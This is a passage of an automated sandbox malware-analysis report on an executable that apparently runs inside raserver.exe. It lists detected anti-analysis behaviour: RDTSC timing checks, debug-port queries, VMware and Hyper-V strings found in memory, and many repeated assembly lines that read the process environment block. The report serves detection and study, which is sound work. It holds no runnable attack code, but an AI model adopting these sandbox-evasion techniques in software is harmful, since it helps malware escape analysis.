          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000009A85F4 second address: 00000000009A85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000009A898E second address: 00000000009A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Windows\explorer.exe TID: 5164Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 4616Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.283051381.000000000113D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 00000003.00000000.269510114.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: raserver.exe, 0000000D.00000002.509359980.000000000308F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW+^
          Source: raserver.exe, 0000000D.00000002.509236536.0000000003062000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.283272252.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000003.00000000.269723701.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000000.261687193.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.269723701.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E06DA mov eax, dword ptr fs:[00000030h]1_2_006E06DA
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E08EE mov eax, dword ptr fs:[00000030h]1_2_006E08EE
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E09DE mov eax, dword ptr fs:[00000030h]1_2_006E09DE
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E099F mov eax, dword ptr fs:[00000030h]1_2_006E099F
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E0A1C mov eax, dword ptr fs:[00000030h]1_2_006E0A1C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28CD6 mov eax, dword ptr fs:[00000030h]13_2_04D28CD6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]13_2_04CEB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h]13_2_04CEB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]13_2_04CEB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]13_2_04CEB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]13_2_04CEB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]13_2_04CEB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D114FB mov eax, dword ptr fs:[00000030h]13_2_04D114FB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]13_2_04CD6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]13_2_04CD6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]13_2_04CD6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59080 mov eax, dword ptr fs:[00000030h]13_2_04C59080
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD3884 mov eax, dword ptr fs:[00000030h]13_2_04CD3884
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD3884 mov eax, dword ptr fs:[00000030h]13_2_04CD3884
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6849B mov eax, dword ptr fs:[00000030h]13_2_04C6849B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C990AF mov eax, dword ptr fs:[00000030h]13_2_04C990AF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8F0BF mov ecx, dword ptr fs:[00000030h]13_2_04C8F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8F0BF mov eax, dword ptr fs:[00000030h]13_2_04C8F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8F0BF mov eax, dword ptr fs:[00000030h]13_2_04C8F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A44B mov eax, dword ptr fs:[00000030h]13_2_04C8A44B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C70050 mov eax, dword ptr fs:[00000030h]13_2_04C70050
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C70050 mov eax, dword ptr fs:[00000030h]13_2_04C70050
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEC450 mov eax, dword ptr fs:[00000030h]13_2_04CEC450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEC450 mov eax, dword ptr fs:[00000030h]13_2_04CEC450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D12073 mov eax, dword ptr fs:[00000030h]13_2_04D12073
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D21074 mov eax, dword ptr fs:[00000030h]13_2_04D21074
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7746D mov eax, dword ptr fs:[00000030h]13_2_04C7746D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D24015 mov eax, dword ptr fs:[00000030h]13_2_04D24015
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D24015 mov eax, dword ptr fs:[00000030h]13_2_04D24015
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]13_2_04CD6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]13_2_04CD6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]13_2_04CD6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]13_2_04CD6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]13_2_04D11C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]13_2_04CD7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]13_2_04CD7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]13_2_04CD7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]13_2_04D2740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]13_2_04D2740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]13_2_04D2740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8BC2C mov eax, dword ptr fs:[00000030h]13_2_04C8BC2C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]13_2_04C8002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]13_2_04C8002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]13_2_04C8002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]13_2_04C8002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]13_2_04C8002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]13_2_04C6B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]13_2_04C6B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]13_2_04C6B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]13_2_04C6B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D08DF1 mov eax, dword ptr fs:[00000030h]13_2_04D08DF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]13_2_04C5B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]13_2_04C5B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]13_2_04C5B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CE41E8 mov eax, dword ptr fs:[00000030h]13_2_04CE41E8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]13_2_04C6D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]13_2_04C6D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7C182 mov eax, dword ptr fs:[00000030h]13_2_04C7C182
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A185 mov eax, dword ptr fs:[00000030h]13_2_04C8A185
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]13_2_04C52D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]13_2_04C52D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]13_2_04C52D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]13_2_04C52D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]13_2_04C52D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8FD9B mov eax, dword ptr fs:[00000030h]13_2_04C8FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8FD9B mov eax, dword ptr fs:[00000030h]13_2_04C8FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C82990 mov eax, dword ptr fs:[00000030h]13_2_04C82990
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C861A0 mov eax, dword ptr fs:[00000030h]13_2_04C861A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C861A0 mov eax, dword ptr fs:[00000030h]13_2_04C861A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C835A1 mov eax, dword ptr fs:[00000030h]13_2_04C835A1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD69A6 mov eax, dword ptr fs:[00000030h]13_2_04CD69A6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]13_2_04CD51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]13_2_04CD51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]13_2_04CD51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]13_2_04CD51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]13_2_04C81DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]13_2_04C81DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]13_2_04C81DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7B944 mov eax, dword ptr fs:[00000030h]13_2_04C7B944
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7B944 mov eax, dword ptr fs:[00000030h]13_2_04C7B944
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C93D43 mov eax, dword ptr fs:[00000030h]13_2_04C93D43
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD3540 mov eax, dword ptr fs:[00000030h]13_2_04CD3540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C77D50 mov eax, dword ptr fs:[00000030h]13_2_04C77D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C962 mov eax, dword ptr fs:[00000030h]13_2_04C5C962
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7C577 mov eax, dword ptr fs:[00000030h]13_2_04C7C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7C577 mov eax, dword ptr fs:[00000030h]13_2_04C7C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B171 mov eax, dword ptr fs:[00000030h]13_2_04C5B171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B171 mov eax, dword ptr fs:[00000030h]13_2_04C5B171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]13_2_04C59100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]13_2_04C59100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]13_2_04C59100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28D34 mov eax, dword ptr fs:[00000030h]13_2_04D28D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov ecx, dword ptr fs:[00000030h]13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8513A mov eax, dword ptr fs:[00000030h]13_2_04C8513A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8513A mov eax, dword ptr fs:[00000030h]13_2_04C8513A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]13_2_04C63D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]13_2_04C84D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]13_2_04C84D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]13_2_04C84D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5AD30 mov eax, dword ptr fs:[00000030h]13_2_04C5AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CDA537 mov eax, dword ptr fs:[00000030h]13_2_04CDA537
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C82ACB mov eax, dword ptr fs:[00000030h]13_2_04C82ACB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28ED6 mov eax, dword ptr fs:[00000030h]13_2_04D28ED6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C836CC mov eax, dword ptr fs:[00000030h]13_2_04C836CC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C98EC7 mov eax, dword ptr fs:[00000030h]13_2_04C98EC7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0FEC0 mov eax, dword ptr fs:[00000030h]13_2_04D0FEC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C676E2 mov eax, dword ptr fs:[00000030h]13_2_04C676E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C816E0 mov ecx, dword ptr fs:[00000030h]13_2_04C816E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C82AE4 mov eax, dword ptr fs:[00000030h]13_2_04C82AE4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEFE87 mov eax, dword ptr fs:[00000030h]13_2_04CEFE87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8D294 mov eax, dword ptr fs:[00000030h]13_2_04C8D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8D294 mov eax, dword ptr fs:[00000030h]13_2_04C8D294
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]13_2_04C552A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]13_2_04C552A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]13_2_04C552A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]13_2_04C552A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]13_2_04C552A5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD46A7 mov eax, dword ptr fs:[00000030h]13_2_04CD46A7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]13_2_04C6AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]13_2_04C6AAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]13_2_04D20EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]13_2_04D20EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]13_2_04D20EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8FAB0 mov eax, dword ptr fs:[00000030h]13_2_04C8FAB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]13_2_04C59240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]13_2_04C59240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]13_2_04C59240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]13_2_04C59240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]13_2_04C67E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]13_2_04C67E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]13_2_04C67E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]13_2_04C67E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]13_2_04C67E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]13_2_04C67E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CE4257 mov eax, dword ptr fs:[00000030h]13_2_04CE4257
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6766D mov eax, dword ptr fs:[00000030h]13_2_04C6766D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0B260 mov eax, dword ptr fs:[00000030h]13_2_04D0B260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0B260 mov eax, dword ptr fs:[00000030h]13_2_04D0B260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28A62 mov eax, dword ptr fs:[00000030h]13_2_04D28A62
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9927A mov eax, dword ptr fs:[00000030h]13_2_04C9927A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]13_2_04C7AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]13_2_04C7AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]13_2_04C7AE73
